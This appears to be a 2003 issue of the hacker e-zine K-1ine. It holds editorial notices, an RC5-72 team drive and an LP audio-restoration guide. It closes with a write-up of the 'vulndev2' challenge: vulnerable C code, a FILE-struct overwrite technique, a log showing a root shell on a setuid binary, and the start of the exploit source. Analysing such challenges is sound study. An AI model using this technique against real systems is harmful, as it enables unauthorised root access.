.,;;;. .,ijffDDDDDLLji;. tfDKKKKELj.;jGKKKKKKKKKKKKKKKDf;. :EKKKEEKKWWWKKKKKKKKKKKKKKKKKKKKKKKEffji. DKEEKKKWWWKKKEEKKKKKKEKDKKEKKKKKKEEEEKWWWL: :KKEKKKWWKKEEKKKKDLfftfiLLtKKWWKKEGLDtGGKWKDL ,KKEKKKWWKKKKKKKEfGLDiGtjEGKK#WWKWKDKEEKEWWKG: ;KKKKKKWKKEKKKKKKKEEGEEDWKKWGiitiitKKKWKKWWWW ,KWKKKWWWKKKKKWKKKKKKKKKWKKWLi::,:,LKWWWWWWjD. :KWKKKWWWWKKWWWKWKKKWKKKWWKWG,:::::jEWWWWWW:: .WWKKKKWWWWWWWWKWWKEWKWKWKEWK,:::::LEGDWWED ;WWKKKKWWWWWWWWWWEDfLDGDEEGLDG:::;ffjLG#f, tWWKKKKKWWWWWWWWGfjiiLLLti:,:;::,DffjtKj LWWKKKKKWWWLttjE#f.:;KWE..::::.:;WE:.ti ;W#KKWKKWWWfiii;KK,::;GL..::::::;j;::j DWWKKWKWWW#EiiiEKG::.:::::::::::;:::f ;#WWWWKWWWWW iGLKWi.:::::::,,,,:::;fK LEEKWWWWWfD, .GKWf:::::::::::::,fKWK: 'ifGWWWWW,j; ;KKf::::::::::::iLWEKKi . ;LWWWG : jKKf::::;ii,:::' WKKWE .,,,;. f##j GKKf::::::f, WKKWKj .,:. :,::: iLj ,KKKG,:::::L,. WKKWW:; ,,:,:... .;,. ..,iitWWKD,:::::ttjii;;i#WKKW .,:,,. ....,:,ii;, ,;;;;;;,;;WWWEt:::.:i;;;;t;tDWKLK .::...:,,:ii;j;:;tt ,;;:::::::;,,fWWWK,,,:,;ii;;,;LDWGttt ':,;;;,;;,,,;jiij' i:::::::::::,:;fEEWE,:,::::::::,Wfi,::i .,;i:,t;,,;,' i:::::::::::::;;;tLGDEt::::::::.jG;;;,:t t;,i;;t. t:::::::::::::::i;;::::ii::::::::;:::iiij. t:,;i,:: i;:::::::::::::::,;;i;::::::,::,,,:::::,;ii: ,,:::,i,,i. ;i:::::::::,:::::::;:;;:,,,,,::,,;,,,,,:::::;i; i:i;,::::;; .i:::::::::,;:::::::,:,;:::::::::,;;;i::::::::::,. ,::::::::t :i:::::::::,ijt;;,,:::,:,::::::::::::,;:::::::::::,;. .;i::::::i ;;:::::::::,;. ;;,,::::,:,:::::::::::::::::::::::::::t i:::::,, ;::::::::::;, ;t:::::i;i::::::::::::::,,;;;,,:::::,j :;::::t ;::::::::::,, .i:::,;tti,::::::::::,,;;;;;i;;,,,;i; :,:::::' ,:::::::::,i' i,:ii;;iii;;;,,,;;;;;;;;;;;;;;;;;t .;:::::::; ,:::::::::i, it;i;;;;;;;;;;;;;;;;;i;;;;;;;;i; .;::::::,;, ,::::::::;; ji;;;;;;;;;;;;i;;;;;;;,,,;;t; ,,::::::::;, ;:::::,,;j, ;;;;;;;;;;;;,;;;;;;;;;;,;j: ,,;:::::::;,. i:::::,;,;;;, ;jii;,,,,,;;;;;;;;,,:,,;,f,,::::::::;, ';:::::::::::, :;,:,,;;;;,,;;,,::,,;;,,i,::::::::;, ',,.::::::::::, ii;;;,,;;,,,:::,;;;;;;,t;:::::::;. :,,:::::::::::, t;::,;;,::,,::,;;;;;;,;ti::::,,: `:,,:::::::::::, t:,;i;::,;;,,;;;;;;;,,;;tj:::;' ',;::::::::::. t;;;,,,;;;,;;;;;;,;;,,;,,j,;' ',;,:::::::;,.tf;:,;;i;:,,;;;;,,;;;;;,;;f ',,:::::::,fKGfjtti::,,;;,:,;;;;;,;;ij '':::::::,KDGDDDGLfffjjffffLGGGKEKj ',:::::GKEEEDDDDDEDEKKKDLKKKKWWK; i,::,DDGDEEKKKKKKKKKKKKKEEEWWKK, :, :,:::iKEDDDDDDEEKEEEDKKKKEEKKKKWf, ;,;i:.,:::,EEDDDDDDGGGGGDDKKKKKKKKKKKKWW; i,tii;::::LEGGGDDDDDDDEEEKKKKKKEDDDEKKKKK. .,j;,i::::jEGGGGGDDEEEDGDDKKKKWKEEKKKKKKKKKt .;iti;::.iKGGGGGGGGGGGDDDDDKKKWKKKKKKKKKKEKW, ;ii;:;LKDGGGDDEEEKKKKKKKKKKKWKKKKKKDDGGEKKKi ;ZEGGGGGGGGDGGGGGGDEKKKKKKWKKKKKEDEEKKKKKE, i;LDDDGGGGGDDDEKKKKEKKKKKKKKKKEKKKDLftii,:;t t;:;iijLDDDGGGGDEKKKKKKKWWKKKKGfti':::,:;it;, :jt;;;;;,;itfffGDKKKKKKKKEGif:;:;;;,;;;:,:i:t .i::::::;,i;;;;;:;,iiijLGjii;;,;:::::::::::;i, t;::::::::::;::;;iittjftt;;:::::::::::::::::t. `;:::::::::::::::::::;jj;;:,::::::::::::::::;: :i::::::::::::::::::,;Gj;;:::::::::::::::::.t. i:::::::::::::::::::,f:i;:::::::::::::::::::t t::::::::::::::::::,t.i,:::::::::::::::::::;: .:::::::::::::::::::,; i::::::::::::::::::::; .:::::::::::::::::::t .,:::::::::::::::::::;: i::::::::::::::::::i .;.::::::::::::::::::t :;:::::::::::::::::;. ',::::::::::::::::::;, j::::::::::::::::::; :,::::::::::::::::::; :t:::::::::::::::::t :,:::::::::::::::::t ,GDDDDt t,:::::::::::::::.t ::::::::::::::::::;. :K####E .................; :::::::::::::::::;, t####G jDKDt .... ..... ::::::::::::. E####, K#####K. . .jD; ;:::::::::. "Lj, i####G W#######f jW##: ,GKKG: :.......... X##E> d##Kf: .####W. G##KEW##" ;E###f ,##@##E ........ ,f""` K##W##L E####; jf" :G####Wf `W##E" .. . 'K##W##.L####;jKj .tD#1"###t . tWED . ,;tkEW#W#WEki, "f##ff###W,f###f `""' j##D W#E#j ;ijfG##WKGfKWk, 7W####W#EKGft t###E.`L####f ,jxxk;, K#W. ,#W#f ,j#K###F" `7##W; ##K f###L "K####j `WXXEKf t##k f##W. ;##D" .KW#K ;d###E##L L###t :W####t ;###i ,###; j##t' GW#Wt .fGW###WEf: .E##K: "#####t L##Wf K##G :##P :G##Wf 7##k ;W##G ;#####i j####i j###: t#y" ,G##W' ,ai####E##K#KDLt. .G###i ;#####j :GK#WfkTL.fWEDK .xyP" .yj#L" ;tfkK#WE#KEWEWGEXi iW##D: "W####D;:, `40` cYb' :E######Ef;. `L#########K;, FIREP0WERMASTER "D##########Wt 0UR K0DE-FU IS BETTER THAN Y0URS "ifDKW####Ky `'""""""' :###: ,G############f; #####, E##############; .iLEDDDDW####KDDDDGGGLt K###t :jK####################; D###j `""""""D####j""""t####, G###i G####i ;####; D#############; ;G#########################t G#############; tW#########################L L###G K####; ;####i D###E ,;GEEE###############: K###f :jK####################; E#############: E###Ei L#############; L###f: K###G :tK########W#############L, ;####f, iL#######################E; ,f####################### f"""""""""D###Gj""""""""` ij########################; f###j: ,,, `""""""""""j###W"""""""""' f###j: ;W#E:. .,t###f" ,;; :jjttttjttE###DLtjttfK###Dji, .iG###f" ,W##f, :j##########################Kj ,ij#################itfGGDDDDDGGW###WEGDDDDGLLLGDL" :jE###################E. f###f, `"""""""""""""""";K###L L###L, f###f L###L; `"""' D###G; '###i' ,i: ,f###i. 7########################################i "#################W#############P" ";` ,i: E### ;#k. j#####################W###########################i :##################################################f, ;###;' E### ,###Kf"` f###Y; d##########j K### d###############P" .G###Y' .;############; E### :#############P" `Y#t: K### .i###########f;. .i###j .d###########f: `##########P' ,f###j;. "#########P" ;L#######j, .f###K" :####Li. ,f###K;, "L####Li:. ;f###f:"###j, `tj####Lfk;.. ,f###Ef` 'i###k. `fEK##############Gj, .,dL###Gi" `D###L `itf############t" ,:t####jt" .####k. ,ij;. `tY###Y" ,,d####";##############################j:, ";" .;k#P" "##############################t; ;#####i" .i####i" .;###;,. .L####;` `7#########:. ":########k;, `"Yi#####L `i####f `:L" __ __ __ __ __ __ __ __ _____ _____ _____ _____ __ __ __ __ _____ _____ __ __ __ __ _____ _____ __ __ _____ __ __ _____ __ __ _____ __ __ _____ ... S u m m e r 2 0 0 3 ... _________________________________________________________________________________ » .- Words from the Editor -. « | *: [-] Introduction ............................................ The Clone :* *: (-) Contact Information ..................................... The Clone :* *: (-) Nettwerked.net: K-1ine magazine goes quarterly .......... The Clone :* *: (-) K-1ine Feedback ......................................... Voyager :* *: (-) Link of the Month ....................................... The Clone :* *: (-) K-1ine Mirrors .......................................... The Clone :* *: (-) RC5-72 Challenge - Join the Bawks.net Team! ............. Bawks.net :* ________________________________________________________________________________ » .- Documents -. « | *: (x) 'Phat audio restoration methods' ......................... CyberSk4nk :* *: (x) 'Details on Exploiting the vulndev2 Challenge' ........... Fractal :* *: (x) 'Waste' .................................................. son4r :* *: (x) 'Waste Network Advisory' ................................. jdm :* *: (x) 'Hack lynksys routeur pppoe' ............................. Dunter :* *: (x) 'A simple (noisy!) TCP scanner'........................... Seuss :* *: (x) 'Identity New' ........................................... Unknown :* *: (x) 'The Ice Hooter: One hit shit!' .......................... Phlux :* _________________________________________________________________________________ » .- Conclusion -. « | *: [-] Credits ................................................. The Clone :* *: [-] Shouts .................................................. The Clone :* _________________________________________________________________________________ Introduction: Welcome to the latest issue of K-1ine #40 'Our Kode-Fu is better than yours'. I would like to thank everyone who submitted articles to me - you sent me so many! Enjoy this issue of K-1ine zine, it should be a fairly good read as it is celebrating its fortieth. A huge thanks to Cyb0rg/asm of Hack Canada (www.hackcanada.com) for the kick-ass ascii for this issue. You did an excellent job (as usual), and for that The Clone thanks you. -` --> Contact Information; Comments/Questions/Submissions: theclone@hackcanada.com Check out my site: (Nettwerked) http://www.nettwerked.net - ----------------------------------------------------------------------- Nettwerked.net: K-1ine magazine goes quarterly [ For Immediate Release ] Monday, June 16, 2003: - Edmonton, Alberta -- In a decision that is sure to make headlines; Nettwerked.net has announced that 'K-1ine', Canada's longest running hacker, phreak, electronics, and political magazine has been turned into one that will now be published quarterly. In its beginning, K-1ine initially started out as a magazine that was released whenever its only editor and major writer, The Clone, had the time to piece the beautiful ascii- art filled digital pages with everything that an underground publication should have. However, after approximately one year, K-1ine quickly grew into a magazine that had many contributing writers and artists, so The Clone decided that keeping K-1ine as a release that came out rarely certainly was not going to cut it for his readers. He wanted to have something that all HackCanada.com / Nettwerked.net visitors could look forward to once a month. So in July of 2000, K-1ine turned into a monthly release, and stayed that way until three years later in the summer of two-thousand and three. Starting this summer, K-1ine #40 will follow the newly implemented quarterly format, and will contain all the great articles and stories that you've grown to love from the magazine that changed the face of the Canadian hacking / phreaking scene forever. Make History: From now until mid summer, you have the opportunity to make history by having your unique and intelligent writings in the groundbreaking new issue and format of K-1ine that is sure to yank the sexzi panties off your hot of-legal-age female counterparts. Upcoming Issues: * Summer 2003: K-1ine 40 * Fall 2003: K-1ine 41 * Winter 2003-2004: K-1ine 42 * Spring 2004: K-1ine 43 Prepare for better quality releases with much more content! -- K-1ine Feedback (Regarding the link of the month for K-1ine 39) From: "Will Spencer" To: Subject: Thanks Date: Mon, 16 Jun 2003 23:26:52 -0600 X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2616 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165 Importance: Normal Thanks for linking my site in your 'zine. :-) Have you seen my most popular site, http://www.hackfaq.org ? Will / Voyager -- --=[ LINK OF THE MONTH ]=-- Every month I post one really great "link of the month" on every issue of K-1ine magazine. The link can be anything in the technology industry, music scene, rave scene, punk scene, or even a good article you read on a news site. I'll be taking submissions via e-mail or IRC right away; so get your links in and maybe you'll see it in the next issue of K-1ine! For the month of June, the link of the month is: http://www.teamabuse.com/toxic/stuff/swk.htm "" The Fat StarWars Kid. If you haven't seen this yet, you should! :) [submitted by: Kybo_Ren] -- K-1ine Mirrors: http://www.mirrors.wiretapped.net/security/info/textfiles/k1ine/ (Now mirrored in two places, one in Belgium and another in Sydney) "Wiretapped.net is an archive of open source software, informational textfiles and radio/conference broadcasts covering the areas of network and information security, network operations, host integrity, cryptography and privacy, among others. We believe we are now the largest archive of this type of software & information, hosting in excess of 20 gigabytes of information mirrored from around the world." -- http://www.hackcanada.com/canadian/zines/index.html#K-1ine Hack Canada - Canadian H/P - E-Zines -- http://www.stealthiscomputer.org/k-1ine.html Steal This Computer - K-1ine Archive -- http://www.to2600.org Toronto 2600 - K-1ine Archive -- RC5-72 Challenge - Join the Bawks.net Team! Strength in numbers... About: That's right, some of the members and affiliates of Nettwerked.net, StealThisComputer.org, Toronto2600.org, and PacketNinja.ca are teaming up to help the international hacker and information security community in breaking the latest RC5-72 bit encryption scheme. Our organization, Team Bawks.net, is comprised of some of the most active and well-known people in the Canadian hacking / phreaking scene. Come Join Team Bawks.net and help us win! Why? Because there's a total cash prize of $10,000 (US) - $1000 for the machine that successfully cracks it, and $1000 for the entire team. The other $6000 goes to a non-profit organization chosen by all participants, and $2000 to distributed.net for building the network and supplying the code. So if you join our team you won't only be able to bask in the glory of being part of the encryption cracking group who owned the planet, but you will also get your fair share of big cash which will be evenly distributed to the group participants. How? So if you think you have what it takes to help us win this contest, then please visit this link. Your computing power and full dedication is what Bawks.net needs and wants! We know you have what it takes. BE ALL THAT YOU CAN BE(TM) (without having to join the silly US Army). For detailed informa- tion on the RC5-72 Challenge, and to download the official client (available for over 20 different types of operating systems) then be sure and visit: www.distributed.net. Registering with our team (update by cyberSk4nk): Registering is easy, once you have submitted at least one work unit. stats.distributed.net contains stats for each member and it is updated at 23:59 UTC (a.k.a. GMT, London time). In order to register for Team Bawks.net, submit at least one work unit by the update time, and then search for your e-mail address using the search box on the rc5-72 project page. At the bottom, there is a link that says "Please e- mail Me My Password". Click on that to get your password, and then login to stats.distributed.net and change it. While you're at it, fix your user pref- erences. Then, after this is done, search for "bawks" in the team search box, and oogle over our wicked stat results! When you are finished being mesmerized by our supercomputing like skillz, click on "I want to join this team" link at the bottom of the team stats. If all works well, it should tell you that you have joined! If it dosen't work, don't panic. First, make sure you did in fact log in with your distributed.net user id and password. If you enter that info incorrectly, you might have to clear your cookies and delete all your stored passwords from your browser. I know The Clone had some nasty problems with that, as did I. Try again, and hopefully it should be peachy. Good Luck! --cyberSk4nk Tips: After you have registered for our team and downloaded the client, you'll need to configure your account. distributed.net client configuration: ------------------------------------- 1) General Client Options 2) Buffer and Buffer Update Options 3) Performance related options 4) Logging Options 9) Discard settings and exit 0) Save settings and exit Choice --> 1 distributed.net client configuration: General Client Options ------------------------------------------------------------ 1) Your email address (distributed.net ID) ==> 2) Complete this many packets, then exit ==> 0 (no limit) 3) Run for this long, then exit ==> 0:00 (no limit) 4) Pause flagfile Path/Name ==> 5) Exit flagfile Path/Name ==> exitrc5.now 6) Enable restart on .ini file change? ==> no 7) "Pause if running" ==> 8) Pause if running on battery power? ==> yes 9) Run detached/disable all screen output? (quiet mode) ==> no 10) Crunch-o-meter (progress indicator) style ==> -1 (auto-sense) 0) Return to main menu Choice --> 1 (Make sure you enter in the e-mail address you used when joining Team Bawks.net) distributed.net client configuration: General Client Options ------------------------------------------------------------ Your email address (distributed.net ID): Completed work sent back to distributed.net are tagged with the email address of the person whose machine completed that work. That address is used as a unique 'account' identifier in three ways: (a) this is how distributed.net will contact the owner of the machine that submits the winning key; (b) The owner of that address receives credit for completed work which may then be transferred to a team account; (c) The number of work-units completed may be used as votes in the selection of a recipient of the prize-money reserved for a non-profit organization. Default Setting: Current Setting: New Setting --> distributed.net client configuration: ------------------------------------- 1) General Client Options 2) Buffer and Buffer Update Options 3) Performance related options 4) Logging Options 9) Discard settings and exit 0) Save settings and exit Choice --> 2 distributed.net client configuration: Buffer and Buffer Update Options: ----------------------------------------------------------------------- 1) Buffer in memory only? (no disk I/O) ==> no 2) In-Buffer Filename Prefix ==> buff-in 3) Out-Buffer Filename Prefix ==> buff-out 4) Checkpoint Filename ==> 5) Disable buffer updates from/to a keyserver ==> no 6) Keyserver<->client connectivity options 7) Disable buffer updates from/to remote buffers ==> no 8) Remote buffer directory ==> 9) Load-work precedence ==> RC5-72,OGR=0 10) Additional buffer-level checking ==> 0 (none) 11) Buffer-level check interval ==> 0:00 (on buffer change) 12) Fetch work threshold ==> OGR=0,RC5-72=0 13) Fetch time threshold (in hours) ==> RC5-72=0 0) Return to main menu Choice --> 9 distributed.net client configuration: Buffer and Buffer Update Options ---------------------------------------------------------------------- Load-work precedence: The order specified here determines the order the client will look for work each time it needs to load a packet from a buffer. For example, "OGR,RC5,..." instructs the client to first look for work for OGR and if it doesn't find any, to try RC5 next, and so on. You can turn off a project by setting ":0" or "=0" after the project's name - for instance, "XYZ:0" tells your client not to work on, or request work for, the XYZ project. It is possible to have the client rotate through this list, updating its buffers only once for each pass. To do so, 'Dialup-link detection' and 'Additional buffer-level checking' must be disabled since a buffer update (new work being made available) would otherwise cause the client to go back to the beginning of the load order. Default Setting: OGR,RC5-72 Current Setting: RC5-72,OGR=0 New Setting --> RC5-72,OGR=0 - Team Bawks.net - i need some keekleberries for my wafflcakes so i can lollerskate in my kekekemobile - ------------------------Phat audio restoration methods-------------------------- by CyberSk4nk ================================================================================ You might think that a hacker or a phreaker has no need to restore audio when there is such a good selection of tunes out there. Despite being lame ass movies, I personally love to crank the "Hackers" or "Swordfish" soundtracks when I'm cruising the net, shooting my mouth off on #hackcanada or getting the latest DivX releases using Bittorent. However, I'm also a huge classic rock fan, and can't live without the likes of Led Zeeplin, Def Leppard, ZZ Top or Chicago blaring through my nice crisp Soundblaster Live card. I have a fair number of nice classic rock CD's, but when you can find an almost never played copy of The Cars' Debut LP at a record sale for 0.50$, how can you pass that up? (I bought this at Victor Post's Garage sale that was put on after he died. This garage sale was an electronics goldmine, since he collected some of the coolest stuff around while he was alive. Too bad he didn't like the Cars! For those that didn't know him, Vic was the Royal Photographer for Alberta and responsible for photographing dignitaries when they visited our beloved Alberta. He was a ham radio operator who was best friends with the late King of Jordan, one of the first guys to experiment with holography, and IMHO one of the best artistic photographer's in Canada. He was a great friend, and taught me some great electronics skillz before he passed away from complications with Diabetes. He was also almost completely blind. RIP VIC.) Such a situation occured last summer, and I though, "Hey, this would sound phat if I could get it on CD and crank it in my nice pimped up ride!" Since then I have been restoring tons of old classics from my Dad and Uncle's record collections that are too good to pass up such as ZZ Top's 1977 "The Best of" album. In this article written exclusively for K-1ine #40, I will instruct all you newbies on audio restoration exactly how to get a near-CD quality restored copy of your favorite LP. First, some sys reqs: --------------------- At least a Pentium II PC with MMX At least 128 MB ram A CD burner. Any will do. Also, you need plenty of blank CD's. 2-4 gigs disspace free. Preferably on an ATA/100 drive or better A decent soundcard. Any will work, but I recommend a Soundblaster Live! that natively supports 32 bit audio for greater quality Cooledit Pro 2.0 (Note, there is a *nix program called gramofile that works great for this purpose too, but it will unfortunately not be covered in this article. Sorry guys.) Note: This procedure will work with tapes as well, although for some reason they don't sound as good at all, since they have less of a dynamic range than LP's. Yes, that's right. Tapes have very a very poor frequency range. However, they don't have clicks and pop's like records do, so don't declick or depop tapes. It's not necessary. Here are the basic steps in restoring an LP: 1. Record side 1 and side 2 using Cooledit to disk, as two continuous files (perferably at a higher bit depth than 16 bits, so that you can edit the file at a high quality and resample later. This makes a *big* difference to the final resulting restored audio) 2. De-click/De-pop the resulting audio 3. Remove the hiss from the audio 4. Divide the restored audio into tracks using cut-and-paste 5. Batch convert the resulting audio to 16-bit, 44100 KHz CD-quality audio (note: only need to do this if you did step 1 with a higher bit depth) 6. Burn the resulting tracks to CD using Nero Burning Rom (recommended) or your other favorite CD-audio burning software (like cdrecord/EasyCD Creator) 7. Rip the burn audio CD to MP3/OGG/ACC/FLAC audio for use on your computer (optional) Ok, so I imagine that gave most people and idea of how this will work. Here are the above 7 steps in more detail: Step 1: Recording the audio --------------------------- In CoolEdit, open up the File menu and click new. If you're soundcard supports it, click the radio button beside "32-bit (float)" and increase the sample rate to a value higher than 44100 KHz. 64000 or 96000 should be great if your card will record at that depth. At this stage, the higher the recording quality will make the restoration process slower, but will increase your overall output audio quality by eliminating minor imperfections in the de-clicking and de-hissing algorithms. Then, make sure you're sound card's mixer settings for recording are set to line in. To record, you'll need a record player, a stereo amplifier, and most likely an RCA jack to 3.5 mm stereo phono adapter. You can get this cable at your local radio shack, future shop or bestbuy where they sell stereo accessories (note: i am not soliciting, this is just examples of stores that might be in your area that might carry audio gear). So, hook this RCA phono cord to your line in of your sound card, and hit the record button to record both sides of the record onto your pc. When recording is done for each side, save each file as a windows *.wav file by using "file-> save as...". Now you are ready to proceed with restoring your favorite tracks. Step 2: Cleaning up the noise ----------------------------- CoolEdit makes it pretty easy to filter out clicks, pops and hiss in records. To remove clicks and pops, open the "Effects->Noise reduction" menu and click on "Click/Pop Eliminator". You will be presented with all sorts of technical options, and if you are in any doubt of how each one effects the final result, use the hand help button in the bottom right corner. For almost all recordings that are in good shape, click on the "Auto Find All Levels" button and wait for it to do some crazy noise-reducing magic. Make sure the option "smooth light crackle" is checked and "multiple passes" is checked and set to a value of around 8. I found 8 to give me the best results for high quality work. Then, make sure the "Run Size" is set to 25 samples for high quality work as well (I stole this trick from the help menu, btw.) Then click OK and wait for your computer to remove the clicks and pops from your recording. Works pretty good, hey? By the way, if you only want to edit certain parts of the recording, you can use the mouse to click and drag a selection region for editing. Note that unselected audio will not be filtered or processed, so always make sure you select *something*. Typically, I always select the entire audio range. Step 3: Reducing Hiss --------------------- Reducing his is really easy. Basically, you first have to select a portion of the recording that contains only hiss, and no music. The best bet is to select the portion of hiss before each song, and reduce the hiss for each track seperately by only processing each song at a time. This improves quality because the amount of hiss can change throughout the recording. To remove hiss, CoolEdit basically subtracts the hiss from the entire recording by a specific volume level set in decibels (dB). Reducing too much hiss results in a "tinny" sounding final result, so generally, you only want to reduce the hiss a little bit, say between 9-20 dB at most, which gives you a nice sounding result. Select a blank portion of the audio that only contains hiss and use "Effects -> Noise Reduction -> Hiss reduction..." and click on the "get noise floor" button to get a statistical profile of the noise. Then, click the ok button to reduce the hiss in that portion you selected. Replay that selectio to see how much hiss can be reduced. Sounds like the Sound of Silence? If it does, click "edit -> undo", select an entire song to de-hiss, and then open up "Effects -> Noise Reduction -> Hiss reduction..." and click on "OK" *without* changing any of the noise profile options, points, or control buttons. There. You Know have a perfectly restored copy of your favorite record. Step 4: Cut the Tracks ---------------------- Now It's time to divide up your tracks. On most records, this is dead simple because there is a gap between each track. On records where all the songs fade into each other, like the Abbey Road album or some live recordings, use your best judgement or check the LP jacket for track times. Use the "Edit -> cut" command, create a new sound track the same bit depth as your original recordig, and use "Edit -> paste" to paste the track data into the new file. Save the new file with a usefull name with a two digit number at the beggining so you know which order the tracks are arranged in. This is important when you want to burn them to cd, as it makes that process easier. Step 5: Downconverting your Tracks ---------------------------------- If you recorded at a higher bitdepth than cd quality (CD quality is 16 bits, 44100 Hz audio) you need to down convert your audio. The batch convert feature of CoolEdit is really usefull for this. Click "File -> Batch Convert" to get the batch converting dialog box. Then, add your track files using the "Add Files" button. Click on the "2. Resample" tab, and then click on "Change Destination Format". Choose 44100 for your sample rate, and 16 bits for your resolution. Click on "enable dithering" and type 1 in the "dither depth" box. Under p.d.f, select "Triangular" or read the help for the pro's/con's of the other options. Also select "No Noise Shaping" from the drop down box. Click "OK". Under new format, choose "Windows PCM (*.wav)" and under the "4. Destination" tab change the output filename template to *_16.wav. This will append 16 to the end of each file so you know they are the down-converted files for burning to cd. Finally, click on "Run Batch" and go get a hot cup of java while your files are converted. Step 6: Burning your tracks to Audio CD --------------------------------------- I really shouldn't have to tell you guys how to do this. It's really simple. Just open nero, create an Audio CD from the wizard, add your tracks with the appened "16" from Step 5, and burn to CD. You might want to change the track gap by using Disk At Once (DAO) burning and setting the trap gap to 0 seconds. That's up to you though, and also it's up to cut your tracks. If you left extra silence on the end of each audio file, you will definitely half to set the track gap length to zero seconds to preserve the orignal time format of the LP. Step 7: Ripping the CD to MP3/OGG/ACC/FLAC ------------------------------------------ I won't cover this, since you guys I'm sure have done this many times before. I might suggest using MusicMatch Jukebox which makes this painless, or GRIP on linux which is also a wicked tool. Note that it is important you do this step last, since the MP3/OGG/ACC formats are lossy audio codecs, and if you convert your restored audio to these formats and then burn them, your audio CD will loose quality. This is also a nice way of testing whether your freshly minted CD works too. A Note from cyberSk4nk: ----------------------- Like many of you, I hate the RIAA, the MPAA and other conglomerates operated by people motivated solely by greed. In this case, you should never half to deal with these evil entities since it is your right by law to make a "fair use" copy of all LPs you own. Of course, if you start taking Boby Dylan's classic LP "Bringin' It all On Home" and distributing it to hundreds or thousands of people, I would like to inform you that *it is not my fault* if you get shit-kicked by corporate boot-fuckers like those from the RIAA. You have been warned. Thanks for reading this wicked 'zine. Shouts go out to wizbone, dec0de, msViolet, nach0 and _mr-t and all other regulars in #hackcanada on irc.stealtc.org:6667. Cheers guys, and have a great weekend! I am now heading for the fridge for my favorite brew. Enjoy the tunes! -cyberSk4nk- -Sat Jun 14 18:14:51 MDT 2003- - I think I have SARS. I'm going to go to school tomorrow and give it to everyone. Bob_Dole was kicked off #hackcanada by wildman (No SARS) - -- Details on Exploiting the vulndev2 Challenge ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ On the vuln-dev mailing list there was a posting that posed a challenge to exploit a certain code fragment. There were a number of ways to exploit this code. Here is a copy of the code: /* vulndev2.c */ #include #include #define BFSIZE 90 int main(int argc, char *argv[]) { char *bfp; char buf[BFSIZE]; FILE *f1; if (argc != 3) return 1; if ( (bfp = malloc(BFSIZE)) == NULL) return 1; /* log input */ if ( (f1 = fopen("db.log", "a+")) == NULL) return 1; fprintf(f1, ";;%s;;", argv[2]); fclose(f1); strcpy(buf, argv[1]); /* read log */ if ( (f1 = fopen("db.log", "r")) == NULL) return 1; if (fgets(bfp, BFSIZE, f1) == NULL) return 1; printf("%s\n", bfp); fclose(f1); exit(0); } There are essentially two straight forward ways to exploit this code: Both of which are more complicated than simply overflowing the ret pointer. (see below for why we can't do this). The most obvious way is to overwrite printf's GOT tables, but the way I did it was by overwriting the FILE * and pointing it to our own specially crafted FILE structure somewhere in memory. From there, when glibc tries to fclose() f1, it uses the function pointer _IO_file_jumps in the FILE structure to jump to a jump table (which we've also placed in memory), which jumps to our shell code. The exploit code is attached to the end of this message. A step by step explanation of the exploit: > /* log input */ > if ( (f1 = fopen("db.log", "a+")) == NULL) > return 1; > fprintf(f1, ";;%s;;", argv[2]); > fclose(f1); We put the memory location of where our specially crafted FILE struct will be into the log file from arg2. > strcpy(buf, argv[1]); This call does most of the work. 4 things of note are put into memory because of it: * A new value for bfp pointing 2 bytes before the f1 variable. * A specially crafted FILE struct * A jump table * Our shellcode > /* read log */ > if ( (f1 = fopen("db.log", "r")) == NULL) > return 1; > if (fgets(bfp, BFSIZE, f1) == NULL) > return 1; Here the program reads in data from the log file. When fgets() writes the data to bfp, it actually overwrites the f1 variable because we changed where f1 is pointing in the previous step. (We point bfp to 2 bytes before f1 because the logfile entry will start with 2 semicolons) > fclose(f1); The system tries to fclose() f1 which is now pointing to our FILE struct. It follows the _IO_file_jumps, selects one of our entries in our jump table and jumps to it. Remember all of our entries in our jump table point to our shellcode. Some notes: * We could also have pointed bfp to the actual location in memory of where the FILE struct for fp was closing and overwrote that, just leaving f1 pointing to where it originally pointed. Both would have worked. * At first glance I thought this exploit was going to be trivial. I thought we could simply smash the stack on the strcpy() call and overwrite main's ret. However, this function only returns in a few instances: not in the default case. Usually it exits using exit() which, of course, ignores any ret calls. A race condition might exist to exploit this however. Consider this: The application opens up the log file for writing and writes its stuff. The application strcpy()s your arg1 into buf. You overwrite main()'s return code to point at some shellcode. Now, if you're extrememly quick, make the file non-readble in some way (deleting it, changing perms, etc): fopen() will return NULL, and main() will return. 0wn3d: > if ( (f1 = fopen("db.log", "r")) == NULL) > return 1; It would probably be easiest to exploit this on a lagged system accessing its filesystems over a high latency means like, say, NFS. * A number of people also suggested a symlink attack. Conclusion: This challenge was good in that it maked us realize just how many ways there are to exploit buggy code. A good rule of thumb is this: If a program allows an attacker access to write to an arbitrary location in memory, the code is almost certainly exploitable. In this sample of code even if the program didn't call printf() or fclose() after the overflow, it still might be possible to exploit this program by putting shellcode in the DTORS. Note: This article is a slightly updated and expanded copy of a message I posted to vuln-dev a while ago. Shouts: madness for forwarding me the vuln-dev message theclone, rt, magma syke GOBBLES for reminding us how painfully necessary coherency is... Fractal The exploit: /* vulndev2.c exploit - (C) 2003 Doug Hoyte and Hypervivid Solutions, Inc www.hypervivid.com www.hcsw.org fractal@efnet doug@saturn:~/devel/vulndev$ uname -mnrsp Linux saturn 2.4.19 i686 unknown doug@saturn:~/devel/vulndev$ gcc -Wall -g -o vulndev2sploit vulndev2sploit.c doug@saturn:~/devel/vulndev$ gcc -Wall -g -o vulndev2 vulndev2.c doug@saturn:~/devel/vulndev$ su Password: root@saturn:/home/doug/devel/vulndev# chown root vulndev2 root@saturn:/home/doug/devel/vulndev# chgrp root vulndev2 root@saturn:/home/doug/devel/vulndev# chmod a+rxs vulndev2 root@saturn:/home/doug/devel/vulndev# exit doug@saturn:~/devel/vulndev$ ls -al vulndev2 -rwsr-sr-x 1 root root 18373 May 24 04:16 vulndev2 doug@saturn:~/devel/vulndev$ ./vulndev2sploit ./vulndev2 bffff86c [*] vulndev2.c sploit by Doug Hoyte: www.hypervivid.com [*] Using offset bffff86c [*] Removing old log file 'db.log' [*] Sploiting... ;;Ìøÿ¿;; sh-2.05a# whoami root sh-2.05a# exit doug@saturn:~/devel/vulndev$ */ #include #include #include /* my strtok's, well... don't ask */ int my_hatoi(char *tp) { int t=0; char tc; if (tp[0]=='0' && tp[1]=='x') tp+=2; while(isxdigit(tc = tolower(*tp))) { if (isdigit(tc)) t = (t<<4) + (tc - '0'); else t = (t<<4) + (tc - 'a' + 10); 